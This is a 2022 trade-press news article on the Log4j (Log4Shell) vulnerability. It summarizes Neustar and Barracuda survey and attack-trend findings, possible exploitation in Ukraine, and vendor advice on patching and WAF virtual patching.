https://www.channelfutures.com/wp-content/themes/channelfutures_child/assets/images/logo/footer-new-logo.png
  • Home
  • Technologies
    • Back
    • SDN/SD-WAN
    • Cloud
    • RMM/PSA
    • Security
    • Telephony/UC/Collaboration
    • Cable
    • Mobility & Wireless
    • Fiber/Ethernet
    • Data Centers
    • Backup & Disaster Recovery
    • IoT
    • Desktop
    • Artificial Intelligence
    • Analytics
  • Strategy
    • Back
    • Mergers and Acquisitions
    • Channel Research
    • Business Models
    • Distribution
    • Tech Services Brokerages
    • Sales & Marketing
    • Best Practices
    • Vertical Markets
    • Regulation & Compliance
    • Diversity, Equity & Inclusion
  • MSP 501
    • Back
    • MSP 501 Information Center
    • 2021 MSP 501 Rankings
  • Intelligence
    • Back
    • Galleries
    • Podcasts
    • From the Industry
    • Reports/Digital Issues
    • Webinars
    • White Papers
  • Channel Futures TV
  • EMEA
  • Channel Chatter
    • Back
    • People on the Move
    • New/Changing Channel Programs
    • New Products & Services
    • Industry Honors
  • Resources
    • Back
    • Advisory Boards
    • Industry Organizations
    • Our Sponsors
    • Advertise
    • 2022 Editorial Calendar
  • Awards
    • Back
    • 2021 MSP 501
    • Circle of Excellence
    • DE&I 101
    • Top Gun 51
    • Channel Partners 101 (CP 101)
  • Events
    • Back
    • CP Conference & Expo
    • MSP Summit
    • Channel Partners Europe
    • Channel Partners Event Coverage
    • Webinars
    • Industry Events
  • About Us
  • DE&I
Channel Futures
  • NEWSLETTER
  • Home
  • Technologies
    • Back
    • SDN/SD-WAN
    • Cloud
    • RMM/PSA
    • Security
    • Telephony/UC/Collaboration
    • Cable
    • Mobility & Wireless
    • Fiber/Ethernet
    • Data Centers
    • Backup & Disaster Recovery
    • IoT
    • Desktop
    • Artificial Intelligence
    • Analytics
  • Strategy
    • Back
    • Mergers and Acquisitions
    • Channel Research
    • Business Models
    • Distribution
    • Tech Services Brokerages
    • Sales & Marketing
    • Best Practices
    • Vertical Markets
    • Regulation & Compliance
    • Diversity, Equity & Inclusion
  • MSP 501
    • Back
    • MSP 501 Information Center
    • 2021 MSP 501 Rankings
  • Intelligence
    • Back
    • Galleries
    • Podcasts
    • From the Industry
    • Reports/Digital Issues
    • Webinars
    • White Papers
  • Channel Futures TV
  • EMEA
  • Channel Chatter
    • Back
    • People on the Move
    • New/Changing Channel Programs
    • New Products & Services
    • Industry Honors
  • Resources
    • Back
    • Advisory Boards
    • Industry Organizations
    • Our Sponsors
    • Advertise
    • 2022 Editorial Calendar
  • Awards
    • Back
    • 2021 MSP 501
    • Circle of Excellence
    • DE&I 101
    • Top Gun 51
    • Channel Partners 101 (CP 101)
  • Events
    • Back
    • CP Conference & Expo
    • MSP Summit
    • Channel Partners Europe
    • Channel Partners Event Coverage
    • Webinars
    • Industry Events
  • About Us
  • DE&I
    • Newsletter
  • REGISTER
  • MSPs
  • VARs / SIs
  • Agents
  • Cloud Service Providers
  • Channel Partners Events
 Channel Futures

MSSP Insider


Shutterstock

Log4j vulnerability

Log4j Vulnerability Remains Headache for Cybersecurity Pros, Likely Exploited in Ukraine Attacks

  • Written by Edward Gately
  • March 2, 2022
The risk of having the vulnerability exploited is much higher under the circumstances.

A new Neustar International Security Council (NISC) survey shows the Log4j vulnerability continues to plague security professionals globally. Moreover, threat actors could exploit Log4j in attacks against Ukraine.

Three out of five organizations have fielded Log4j attacks. Log4Shell is a zero-day exploit in the popular Java logging library log4j. It results in remote code execution (RCE) by logging a certain string.

Researchers discovered Log4j vulnerability in early December. Log4J led to an explosion of attacks.

Carlos Morales is senior vice president of solutions at Neustar Security Services.

Neustar's Carlos Morales

Neustar’s Carlos Morales

“In general, there is ample evidence of increased cyber activity towards Ukraine-based companies,” he said. “So it is of great importance for those companies to ensure they are preventing access to any known vulnerabilities like Log4j that could be exploited. The risk of having the vulnerability exploited is much higher under the circumstances.”

Personally Impacted by Log4j Vulnerability

Among the NISC survey findings:

  • Log4j has personally impacted three-quarters of respondents. In addition, one in five said the impact had been significant.
  • Nearly half said Log4j has made them reevaluate software supply chain security practices and purchasing decisions.
  • A substantial majority said regulatory bodies like the Federal Trade Commission (FTC) should take legal action against organizations that fail to patch for Log4j.

For companies that have deployed web application firewall (WAF) technology or contract WAF functions from their cloud security providers, there may be a simple solution for handling zero-day threats like Log4j. That’s virtual patching.

Virtual patching tricks any potential attackers into thinking that applications aren’t vulnerable to a threat, Morales said.

“The WAF terminates the connection with the client, ensures that the client is not performing any malicious actions, and then creates a separate connection to the server, bridging data between the two,” he said. “Since it is terminating the client traffic, the WAF can act on behalf of the origin server and cover up for any vulnerabilities that exist on the server.”

Still At It 2 Months Later

Hackers pounced on Log4Shell vulnerabilities in December, and hackers are still at it two months later, according to new Barracuda research.

Since Dec. 10, Barracuda researchers have analyzed the Log4j software attacks and payloads detected by its systems. The volume of attacks attempting to exploit these vulnerabilities has remained relatively constant with a few dips and spikes over the past two months.

Given the popularity of the software, the exploitability of the vulnerability and the payoff when a compromise happens, Barracuda researchers expect this attack pattern to continue, at least for the short-term.

Among Barracuda research findings:

  • The majority of attacks came from IP addresses in the United States. Half of those IP addresses are associated with Amazon Web Services (AWS), Azure and other data centers.
  • Threat actors are sending attacks from Japan, Germany, Netherlands and Russia.

Tushar Richabadas is Barracuda’s senior product manager of application and cloud security. He said cybercriminals likely have had some success with Log4Shell.

Barracuda's Tushar Richabadas

Barracuda’s Tushar Richabadas

“We’re seeing a lot of scans, and a lot of attacks, but not many high-profile breaches,” he said. “A large portion of the exploit attempts are cryptominers. There were also distributed denial-of-service (DDoS) bots like Mirai and such. We’re slowly hearing about more significant attackers like the … Conti group using this vulnerability. So we’ll likely see bigger breaches happening over time.”

Long Tail for Log4j Attacks

There is probably going to be a long tail for these attacks and scams, Richabadas said. Therefore, patching is going to remain critical for a very long time.

ProxyLogon vulnerabilities were discovered in March of last year. However, Barracuda saw renewed interest from malware groups in November, he said.

“We’ll probably see something similar with Log4Shell as well,” Richabadas said. “A large number of organizations have patched or upgraded their vulnerable installations, and have also added layers of protection against such attacks. This is something that has stopped a large number of these attacks. In terms of stopping the threat actors themselves, the most effective has been the takedowns of the payload servers and callback servers.”

Want to contact the author directly about this story? Have ideas for a follow-up article? Email Edward Gately or connect with him on LinkedIn.
Tags: MSPs Channel Research Cloud Data Centers EMEA MSSP Insider Security

Most Recent


  • Ingram Micro Cloud Summit: From the Expo Floor
    "By gaining access to an ecosystem of partners, we’ll put distribution at the center of our channel strategy,” summit participants said.
  • Old job new job
    Exclusive: Zoom Channel Leader Laura Padilla Takes New Role with Airtable
    Airtable's valuation reached $11 billion in December.
  • Accelerating revenue
    Barracuda: MSP Revenue Accelerating in 2022, Increasing Demand Creating Challenges
    Security remains the biggest concern for customers and the greatest revenue opportunity for MSPs.
  • complexity, maze
    Analysts: Cisco 'Bitten by Macro Issues' in Flat Q3 Earnings
    "Order as early as you can, because I think these delays are going to carry on into 2024, maybe even 2025," one analyst told partners.

Leave a comment Cancel reply

-or-

Log in with your Channel Futures account

Alternatively, post a comment by completing the form below:

Your email address will not be published. Required fields are marked *

Related Content

  • Russia-Ukraine Conflict
    Check Point, Sophos, Trend Micro Among Cybersecurity Providers Responding to Ukraine Crisis
  • Ukraine flag
    The Gately Report: Proofpoint Tracking Ukraine Crisis for Partners, Customers; New Darktrace Division
  • Penetration Testing
    6 Important Penetration Testing Certification Programs in 2022
  • internal defenses
    Adlumin Launches New MSP Partner Program

Upcoming Events

View all

Channel Partners Europe

June 14, 2022 - June 15, 2022

MSP Summit

September 13, 2022 - September 16, 2022

Galleries

View all

Ingram Micro Cloud Summit: From the Expo Floor

May 20, 2022

What Does TSB Consolidation Mean for Vendors? Channel Reacts to PlanetOne-Avant Deal

May 19, 2022

The Gately Report: BlackBerry Ups Investment, Support of MSSP Partners

May 19, 2022

Industry Perspectives

View all

How SD-WAN Helps Secure the Expanding Network Perimeter

May 19, 2022

A Sneak Peek at the 2022 BrightCloud Threat Report

May 17, 2022

Build Customers for Life with CX and Lifecycle Selling

May 16, 2022

Webinars

View all

Simplifying SaaS Security for MSPs

April 27, 2022

How to Supercharge The Network to Support Your IT Superhero Moves

May 3, 2022

The 2022 MSP Challenge: Scale Service Delivery Despite the Talent Gap

April 21, 2022

White Papers

View all

The New Bottom Line: How MSPs Can Meet the Healthcare Crisis While Evolving Their Businesses

April 19, 2022

How to build a Security Operations Center (on a budget)

April 4, 2022

The AT&T Cybersecurity Incident Response Toolkit

April 4, 2022

Channel Futures TV

View all

AT&T, Microsoft, Cisco, ThreatLocker on Unlocking Partner Potential

Agents Share ‘Secrets,’ Industry Opportunity

May 11, 2022

Vonage Addresses Potential Partner Opportunity via Acquisition by Ericsson

May 5, 2022

Lumen Technologies ‘Built for Growth and Scale’

May 4, 2022

Twitter

ChannelFutures

Photos from Expo @IngramMicroInc Cloud Summit for @pluralsight, @Vonage, @CloudCt4, @watchguard, @TenableSecurity,… twitter.com/i/web/status/1…

May 20, 2022
ChannelFutures

.@Zoom channel leader @LauraPadillaSF has taken a new role with @airtable. dlvr.it/SQm6pd https://t.co/R71QtFlwwy

May 20, 2022
ChannelFutures

Was Cisco right to blame "external factors" for its latest numbers? @zkerravala, @AnuragTechaisle, @OmdiaHQ and… twitter.com/i/web/status/1…

May 20, 2022
ChannelFutures

The deal between @Avant_CCC and @PlanetOneComm comes at a critical juncture in the channel, as vendors envision dea… twitter.com/i/web/status/1…

May 19, 2022
ChannelFutures

.@QNAP_nas warns of #ransomware attack on storage devices. dlvr.it/SQhjs3 https://t.co/2FL32Zh5Be

May 19, 2022
ChannelFutures

We're excited to announce that @Alvinstafford of @thinktrue_ & @MorganGranfield of @digitalrealty will be on the pa… twitter.com/i/web/status/1…

May 19, 2022
ChannelFutures

Check out the latest $CSCO earnings. dlvr.it/SQgxBF https://t.co/fsKaMfOJlL

May 19, 2022
ChannelFutures

Heard about #Xvantage at @IngramCloud Summit? We have details. The distributor calls it “an important milestone” fo… twitter.com/i/web/status/1…

May 19, 2022

MSSP Insider

Business advice for MSSPs and news from the broader security channel.

Newsletters and Updates

Sign up for The Channel Report, Channel Futures Update, MSP 501 Newsletter and more.

Live Channel Events

Get the latest information on the next industry-leading Channel Partners event.

Galleries

Educational slide shows and images from live events.

Media Kit And Advertising

Want to reach our audience? Access our media kit.

DISCOVER MORE FROM INFORMA TECH

  • Channel Partners Events
  • Telecoms.com
  • MSP 501
  • Black Hat
  • IoT World Today
  • Omdia

WORKING WITH US

  • Contact
  • About Us
  • Advertise
  • Newsletter

FOLLOW Channel Futures ON SOCIAL

  • Privacy
  • CCPA: “Do Not Sell My Data”
  • Cookie Policy
  • Terms
Copyright © 2022 Informa PLC. Informa PLC is registered in England and Wales with company number 8860726 whose registered and Head office is 5 Howick Place, London, SW1P 1WG.
This website uses cookies, including third party ones, to allow for analysis of how people use our website in order to improve your experience and our services. By continuing to use our website, you agree to the use of such cookies. Click here for more information on our Cookie Policy and Privacy Policy.
X